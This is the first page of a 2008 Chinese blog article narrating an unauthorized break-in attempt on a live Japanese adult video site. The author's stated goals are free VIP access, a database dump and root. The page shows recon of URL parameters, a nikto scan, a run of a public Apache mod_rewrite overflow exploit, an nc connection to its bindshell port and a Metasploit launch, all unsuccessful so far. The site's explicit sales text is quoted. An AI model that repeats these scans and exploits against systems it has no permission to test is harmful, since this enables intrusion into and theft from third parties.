因为此站为大名鼎鼎的XX电影站,流量很大,且内容很不和谐,所以一切whois,网站内容,重要渗透信息都不方便公开。
第一次在team外写有关渗透的文章,呵呵。当然,还是一如既往的猪肉炖粉条---没技术含量.主要是启发下只会在winows下搞搞asp的"啊D专家,明小子高手们",Linux下一样搞渗透!
整个过程均在Ubuntu 7.10 i386 (Kernel 2.6.22)下完成,没有用到任何windows下的,非GPL的工具...以及任何非公开技术,所有工具都可以在sourceforge下载到源码.
写的断断续续的,今天终于打算给写完了..
目标:这是一个"日本电影站",所以俺的目标很简单...有个能看电影的vip足够咯...当然...能把库dump下来就爽了...厄....有个webshell,不....root就爽大啦。。
正文:
渗透的第一步当然是踩点了,恩,先以一个正常人的角度,转了一圈:)
下面是得到的信息:
恩...涂了半天才把那个女同志不和谐的部分抹掉..
进入主页,先是选择语言,这里注意了下,不是诸如index.php?lang=kr这样加载对应的语言库,而是/kr,/us,并且有单独的一套完整的程序。(Jp目录下个别的文件在US,KR下没有,所以是独立的程序)
接着打开一个链接,恩,是jp/movie_actress.html?actid=1786。观察这个链接,先不说为啥是html...后面的actid明显是"演员名",而且确实有查询,非静态。
再点了下new user,看能免费注册不?
Start your ultimate masterbation live only with US$19.80
xxxxx.tv receives only US$19.80 a month. You can download unlimited number of porn movies.
So many titles, all you can watch!
xxxxx.tv offers any kinds of movie titles. We hold more than 700 movies lined up, including popular pornstar, amateur, and celebrity's covert movies. Also, xxxxx.tv brings new title movies one right after the other. You never ever finish downloading.
DVD class high quality movie
All xxxxx.tv movies are provided by 1Mbps (Mega bit per second); you will be able to watch crisp screen image.
All movie has a free sample
All xxxxx.tv movies proffers free sample movies. Users who haven't signed up yet will receive benefit from this trial.
Free movie collection without a membership!
xxxxx.tv tees up special contents, 1 entire movie download for free. People whether who are our members or not will download 1 entire movie for free. This special contents will be updated periodically, so you can form free movie collection.
恩,$19.8一个月,确实不是很贵哦...
不过中国人一般不会为看电影而买会员的:)
甚至有我这样的贱人.....去XX他...
又看了页面加载信息,发现图片链接是在单独的服务器上,img01.XXXXXX.tv,img02.XXXXX.tv,又点了下sample movie,链接是video015.XXXXXXX.tv,这个该死的sample movie竟然只有1分钟不到,真是够抠门,不过是1500kps....
没有找到登录的地方,直接点full movie,弹出了登录框.随便打了个sucker:sucker,弹出" ログインユーザー名またはパスワードが違います。
ログインに失敗しました。" 失败这俩字我还是认识的...再注意下链接,video.html?videocode=A15-197B&no=100&server =www11&type=n250,根据不同的电影测试,可以判断,videocode是电影编号,no是分段的序列号,server当然是服务器,type是码流。
下面开始探测渗透信息:
knell@Knell-SuckEr:~/nikto-2.02$ ./nikto.pl -host www.XXXXXXX.tv
- ***** SSL support not available (see docs for SSL install instructions) *****
---------------------------------------------------------------------------
- Nikto 2.02/2.03 -
+ Target IP: 66.230.XXX.XXXX
+ Target Hostname: www.XXXXXX.tv
+ Target Port: 80
+ Start Time: 2008-03-03 18:02:09
---------------------------------------------------------------------------
+ Server: Apache/1.3.33 (Unix) PHP/5.0.5
knell@Knell-SuckEr:~/nikto-2.02$
这里用到的工具是nikto,为开源的perl脚本
可以看到banner是Apache/1.3.33 (Unix) PHP/5.0.5,所以应该是LAMP组合了。那为啥页面是.html呢?呵呵,记得apache有个mod_rewrite不?而且...2007年暴出过一个remote buffer overflow级的漏洞哦...
赶紧找出exp,测试下:) (此exp可在milw0rm上找到)
knell@Knell-SuckEr:~$ sudo sh ./apache_mod_rewrite.sh www.xxxxx.tv
-e mod_rewrite apache off-by-one overflow
by jack
HTTP/1.1 400 Bad Request
Date: Fri, 07 Mar 2008 13:32:10 GMT
Server: Apache/1.3.33 (Unix) PHP/5.0.5
Connection: close
Content-Type: text/html; charset=iso-8859-1
400 Bad Request
Bad Request
Your browser sent a request that this server could not understand.
The request line contained invalid characters following the protocol string.
貌似不成功...测试下:) (# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice )
knell@Knell-SuckEr:~$ nc www.xxxxx.tv 30464
www.xxxxx.tv [66.230.xxx.xxx] 30464 (?) : Connection refused
果然不成功:) 接着请出metasploit。
21:03:00 - Initialized the Metasploit Framework GUI.
21:03:29 - apache-mod-rewrite [*] Launching exploit windows/http/apache-mod-rewrite...
21:03:30 - apache-mod-rewrite [*] Started bind handler
21:03:31 - apache-mod-rewrite [*] Trying ...
然后就一直trying........trying....没反应了...tcp 4444也连不上 囧:)
看来管理员还不是很傻哦.
[1] [2] [3] [4] 下一页
[图文]linux平台下渗透日本著名XXXXXX.TV
您现在的位置: